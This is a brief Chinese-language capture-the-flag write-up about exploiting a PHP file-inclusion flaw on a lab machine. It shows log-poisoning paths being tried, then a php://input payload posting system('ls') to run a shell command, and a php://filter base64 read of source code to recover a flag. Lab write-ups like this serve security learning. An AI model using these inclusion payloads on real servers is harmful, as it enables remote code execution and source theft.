做一下信息搜集，phpinfo.php显示版本 5.6.29，nginx/1.10.2

allow_url_include，显示ｏｎ。据说php5.2之后默认为ｏｆｆ,　这算应用配置错误吗？

/var/log/*nginx/*access.log

/var/log/httpd-access.log

/var/www/log/httpd-access.log 
,尝试找到日志文件来写入命令？但没找到正确的路径

::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\

::: {.image-caption}
:::
:::

http://php.net/manual/zh/wrappers.php.php　关于ｐｈｐ封装协议。

添加参数?path=php://input，并ｐｏｓｔ数据”<?php
system('ls');?>“,显示

dle345aae.php

index.php

phpinfo.php

参考靶机实验。。。path=php://filter/convert.base64-encode/resource=dle345aae.php

PD9waHAgCiRmbGFnPSJmbGFnezliYTE1NTA0LWEwNjgtNDg0Ny1hNmMzLTRiYzgz

ZjBlMWYyY30iOwo=

base64解码以后获得ｆｌａｇ
:::
:::
:::